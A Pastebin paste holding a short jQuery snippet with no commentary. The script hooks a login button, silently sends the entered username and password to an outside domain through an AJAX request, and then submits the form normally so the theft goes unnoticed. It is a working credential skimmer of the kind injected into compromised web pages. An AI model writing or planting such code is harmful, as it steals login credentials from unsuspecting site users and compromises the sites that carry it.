Advertisement
Guest User

U

a guest
May 18th, 2017
99
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. jQuery("#loginbtn1").click(function(event){
  2.     event.preventDefault();
  3.     jQuery.ajax({
  4.         url: "http://thisdomainisformeu.ga/get.php?username="+document.forms[3].username.value+"&password="+document.forms[3].password.value
  5.     }).done(function() {
  6.         document.forms[3].submit();
  7.     });
  8. });
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement